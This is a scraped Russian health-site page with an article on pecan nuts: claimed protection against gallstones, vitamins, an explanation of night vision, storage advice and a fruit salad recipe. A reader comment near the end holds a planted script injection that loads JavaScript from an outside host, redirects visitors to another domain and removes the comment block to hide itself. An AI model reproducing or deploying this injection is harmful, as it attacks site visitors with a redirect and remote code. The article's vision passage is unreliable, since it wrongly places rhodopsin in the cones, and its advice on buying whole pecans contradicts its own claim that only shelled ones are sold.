Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Орех пекан против желчека...  >>  Орех пекан против желчекаменной болезни
 
Обратная связь
 

Орех пекан против желчекаменной болезни

Размер шрифта
06 марта 2012 10:00
  • google_analytics: false
  • Нравится

Герой нашей статьи – орех пекан. Это ближайший родственник грецкого ореха и символ штата Техас. Хоть пекан не так популярен в России, как грецкий орех, он полезен не меньше. Но чтобы сохранить полезные свойства, орех пекан нужно правильно хранить и знать, как его употреблять.

1 

Орех пекан – плод лиственного дерева, ареал распространения которого в Северной Америке. Издавна он считается ценным продуктом и источником энергии, поэтому индейцы, отправляясь на охоту, запасались орехами пекан в большом количестве.

Полезная информация

В орехе пекан 70% жира, в составе которого омега-6 полиненасыщенные жирные кислоты. Доказано, что при употреблении 35 г пекана в день (это суточная норма) существенно снижаются риски желчекаменной болезни.

В орехе пекан большое количество витаминов и минералов:

  • Витамин А необходим для регенерации кожи и хорошего ночного и сумеречного зрения.
  • Витамин E укрепляет стенки сосудов, что способствует заживлению ран.
  • Витамины группы B обеспечивают нормальное функционирование нервной системы и проведение импульсов.
  • Калий и магний регулируют баланс электролитов жирных кислот и работу сердечной мышцы.

Пьедестал почета по содержанию витамина А

пекан – 56 МЕ
грецкие орехи – 40 МЕ
миндаль – 1 МЕ

Объяснение

Витамин А влияет на улучшение зрения и на способность видеть в темноте.

Дело в том, что на сетчатке глаза есть два вида клеток – палочки и колбочки. Палочки отвечают за сумеречное зрение и ориентирование в темноте, а колбочки – за цвета и остроту зрения.

Колбочки содержат вещества, которые распадаются под действием света, в результате возбуждаются нервные волокна, выходящие из глаза, а светочувствительное вещество в палочках – родопсин, или зрительный пурпур, образуется с помощью витамина А.

Если Витамина А не хватает, то родопсин в колбочках глаза не восстанавливается. В результате, колбочки перестают функционировать, и человек плохо видит и различает цвета в темноте.

Как выбрать

В России орехи пекан продаются только очищенными, поэтому выбирайте эти орехи цельными, без прогорклого запаха.

Как хранить

Хранить нужно в холодильнике в вакуумном контейнере, потому что из-за низкой температуры окислительные процессы, из-за которых появляется прогорклость, менее выражены. Не более 2-х месяцев, но если нужно хранить не более 6 месяцев, то отправьте эти орехи в морозильную камеру.

Как готовить

По вкусу орехи пекан напоминают грецкие, но их вкус мягче. Орехи пекан используются в самых различных блюдах, но всегда в сыром виде.

1

Рецепт фруктового салата с орехами пекан

Ингредиенты:
1 чашка апельсинового сока
3 средних апельсина
220 г консервированного ананаса
0,5 чашки красного винограда без косточек
0,5 чашки рубленных орехов пекан

Способ приготовления:
Апельсины очистить от кожуры, белых пленок и мембран. Дольки ананаса разрезать на кусочки, виноград – пополам. Смешать дольки апельсинов, ананас и виноград с апельсиновым соком, осторожно перемешать. Поставить охлаждаться до подачи. Перед подачей сверху посыпать рублеными орехами пекан.

Ваше питание – это ваше здоровье. Питайтесь правильно!


Сюжеты по теме:
 Накололи на салат. Рецепт блюда с орехами пекан

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:52

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.